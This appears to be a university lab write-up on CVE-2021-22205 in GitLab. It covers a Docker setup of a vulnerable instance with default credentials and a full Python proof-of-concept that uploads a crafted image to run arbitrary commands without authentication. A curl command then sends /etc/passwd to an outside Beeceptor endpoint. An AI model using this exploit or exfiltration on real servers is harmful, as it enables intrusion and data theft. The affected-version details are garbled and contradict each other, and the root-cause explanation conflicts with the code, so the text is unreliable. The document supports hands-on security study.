Khasan Abdurakhmanov 
Innopolis University 
TABLE OF CONTENTS
CVE-2021-22205 is a critical security vulnerability that was discovered in the GitLab Community Edition and GitLab Enterprise Edition software. The vulnerability allows an unauthenticated attacker to execute arbitrary code on the GitLab server. The vulnerability was discovered in the GitLab file upload functionality. Specifically, it was found that GitLab did not properly sanitize and validate user-supplied file names, allowing an attacker to craft a malicious file name that could lead to remote code execution.
In order to gain a comprehensive understanding of the vulnerability you are dealing with and to exploit it effectively, it is imperative to have a collection of specific tools at your disposal. Here is a list of the essential tools you will need:
Docker
Docker is a platform that has gained wide acceptance for containerization. It greatly simplifies the process of managing and deploying applications in containers, making it a vital tool for any developer.

Beeceptor
Beeceptor is a free online tool that provides a set of features to help developers test and debug their APIs. It allows you to create mock API endpoints that mimic the behavior of real APIs. You can define the expected request parameters, headers, and body, and specify the response that should be returned.

In addition to Docker, this guide will also use Docker Compose to define and manage the multi-container application. Docker Compose allows you to define the services, networks, and volumes required for the application in a single configuration file, making it easier to set up and manage the environment.

There are only one way provided to set up Vulnerable-GitLab-CVE-2021-22205 using Docker Compose.
git clone https://github.com/SNE-M23-SN/Vulnerable-GitLab.git
cd Vulnerable-GitLab/CVE-2021-22205/


docker compose up -d

Redis:
redis:5.0.9-alpine Docker image, which is a lightweight Alpine-based Redis image.PostgreSQL:
postgres:12-alpine Docker image, which is a lightweight Alpine-based PostgreSQL image.POSTGRES_USER: The username for the PostgreSQL database, which is set to gitlab.POSTGRES_PASSWORD: The password for the PostgreSQL database, which is set to password.POSTGRES_DB: The name of the PostgreSQL database, which is set to gitlabhq_production.DB_EXTENSION: The PostgreSQL extensions to enable, which are pg_trgm and btree_gist.GitLab:
vulhub/gitlab:13.10.1 Docker image, which is a pre-configured GitLab image.DEBUG: Set to false, which disables debug-level logging.DB_ADAPTER: Set to postgresql, which specifies the database adapter to use.DB_HOST: Set to postgresql, which is the hostname of the PostgreSQL service.DB_PORT: Set to 5432, which is the default PostgreSQL port.DB_USER: Set to gitlab, which is the username for the PostgreSQL database.DB_PASS: Set to password, which is the password for the PostgreSQL database.DB_NAME: Set to gitlabhq_production, which is the name of the PostgreSQL database.REDIS_HOST: Set to redis, which is the hostname of the Redis service.REDIS_PORT: Set to 6379, which is the default Redis port.GITLAB_HTTPS: Set to false, which means GitLab will use HTTP instead of HTTPS.SSL_SELF_SIGNED: Set to false, which means GitLab will not use self-signed SSL/TLS certificates.GITLAB_HOST: Set to localhost, which is the hostname for the GitLab instance.GITLAB_PORT: Set to 8080, which is the port for the GitLab instance.GITLAB_SSH_PORT: Set to 10022, which is the SSH port for the GitLab instance.GITLAB_RELATIVE_URL_ROOT: Left empty, which means GitLab will be accessible at the root URL.GITLAB_SECRETS_DB_KEY_BASE, GITLAB_SECRETS_SECRET_KEY_BASE, and GITLAB_SECRETS_OTP_KEY_BASE: Set to long, random secret keys used for various GitLab encryption and signing purposes.TZ: Set to Asia/Kolkata, which is the timezone for the GitLab instance.GITLAB_TIMEZONE: Set to Kolkata, which is the timezone for the GitLab instance.GITLAB_ROOT_PASSWORD: Set to vulhub123456, which is the initial password for the GitLab root user.This infrastructure setup provides a complete GitLab environment, including a Redis cache, a PostgreSQL database, and the GitLab application itself.
Access GitLab
Open http://localhost:8080 in your web browser to access the GitLab interface. The credentials of default administrator account are root and vulhub123456

CVE-2021-22205 is a critical security vulnerability affecting GitLab, a widely used platform for DevOps lifecycle management. This vulnerability allows an unauthenticated attacker to execute arbitrary code on a GitLab server, posing significant risks to the confidentiality, integrity, and availability of data hosted on the platform.

13.10.3 to 13.9.6 and 13.8.8.13.10.3.13.8.8.Remote Code Execution (RCE).Critical.The vulnerability is caused by improper sanitization and validation of user-supplied file names in the GitLab file upload functionality. An attacker could craft a malicious file name that, when processed by GitLab, would lead to remote code execution on the server.
The root cause of the vulnerability lies in the way GitLab handles file uploads and the lack of proper input validation and sanitization. This allowed an attacker to bypass the security measures and execute arbitrary code on the server.
Exploit Scenario
Prerequisites:
Target Identification: Identify a GitLab instance running a vulnerable version (prior to 13.10.3, 13.9.6, or 13.8.8).Access: Typically, attackers do not require prior authentication to exploit this vulnerability, making it particularly dangerous if the GitLab server is exposed publicly.Proof Of Concept

This script is a Proof of Concept (PoC) for the CVE-2021-22205 vulnerability in GitLab. Let’s break down the key components of the script:
import sys
import re
import requests
target = sys.argv[1]
command = sys.argv[2]
session = requests.session()
CSRF_PATTERN = re.compile(rb'csrf-token" content="(.*?)" />')
def get_payload(command):
rce_payload = b'\x41\x54\x26\x54\x46\x4f\x52\x4d'
rce_payload += (len(command) + 0x55).to_bytes(length=4, byteorder='big', signed=True)
rce_payload += b'\x44\x4a\x56\x55\x49\x4e\x46\x4f\x00\x00\x00\x0a\x00\x00\x00\x00\x18\x00\x2c\x01\x16\x01\x42\x47\x6a\x70\x00\x00\x00\x00\x41\x4e\x54\x61'
rce_payload += (len(command) + 0x2f).to_bytes(length=4, byteorder='big', signed=True)
rce_payload += b'\x28\x6d\x65\x74\x61\x64\x61\x74\x61\x0a\x09\x28\x43\x6f\x70\x79\x72\x69\x67\x68\x74\x20\x22\x5c\x0a\x22\x20\x2e\x20\x71\x78\x7b'
rce_payload += command.encode()
rce_payload += b'\x7d\x20\x2e\x20\x5c\x0a\x22\x20\x62\x20\x22\x29\x20\x29\x0a'
return rce_payload
def csrf_token():
response = session.get(f'{target}/users/sign_in', headers={'Origin': target})
g = CSRF_PATTERN.search(response.content)
assert g, 'No CSRF Token found'
return g.group(1).decode()
def exploit():
files = [('file', ('test.jpg', get_payload(command), 'image/jpeg'))]
session.post(f'{target}/uploads/user', files=files, headers={'X-CSRF-Token': csrf_token()})
if __name__ == '__main__':
exploit()
print('finish test')
Imports:
sys for command-line arguments, re for regular expressions, and requests for making HTTP requests.Command-line Arguments:
target (the URL of the vulnerable GitLab instance) and command (the command to be executed on the server).CSRF Token Retrieval:
csrf_token() function retrieves the CSRF token from the GitLab login page. This token is required for the file upload request to be successful.Payload Generation:
get_payload(command) function generates the malicious payload that will be used in the file upload.command on the server.Exploitation:
exploit() function performs the actual exploitation:
/uploads/user endpoint on the target GitLab instance.Main Execution:
if __name__ == '__main__' block calls the exploit() function to execute the attack.This PoC script demonstrates how an attacker can exploit the CVE-2021-22205 vulnerability in GitLab to execute arbitrary commands on the server. By crafting a malicious file name and including the payload in the file content, the script can bypass the GitLab security measures and gain remote code execution on the target system.
To use this PoC, you would need to provide the URL of the vulnerable GitLab instance and the command you want to execute on the server as command-line arguments. For example:
python poc.py http://gitlab.example.com "touch /tmp/success"

This would execute the touch /tmp/success command on the target GitLab server if the vulnerability is present and the exploitation is successful.

To further enhance our understanding and usage of this script, we can take advantage of the following command:
curl -X POST -F "file=@/etc/passwd" https://inno-sne.free.beeceptor.com

This specific command will enable us to send a POST request to the specified URL. As a result of executing this command, what happens is that we upload the contents of the /etc/passwd file directly to the previously created Beeceptor endpoint. This is highly beneficial as it allows us to view and interact with the contents of the –/etc/passwd== file through our Beeceptor Endpoint, which we had the foresight to set up in advance. It’s a smart and efficient way to fully utilize this script to our advantage.

The impact of CVE-2021-22205 is severe, as it allows an unauthenticated attacker to gain complete control over the GitLab server. This could lead to data breaches, system compromise, and further attacks on the organization’s infrastructure. The vulnerability affects GitLab Community Edition versions 13.9.0 through 14.1.7, and GitLab Enterprise Edition versions 13.9.0 through 14.1.7. It is considered a critical vulnerability with a CVSS score of 10.0, the highest possible severity rating.
CVE-2021-22205 exposes a critical vulnerability in GitLab’s file upload functionality, allowing attackers to execute arbitrary commands on a vulnerable server. This exploit underscores the importance of robust security practices and prompt patch management in protecting GitLab deployments.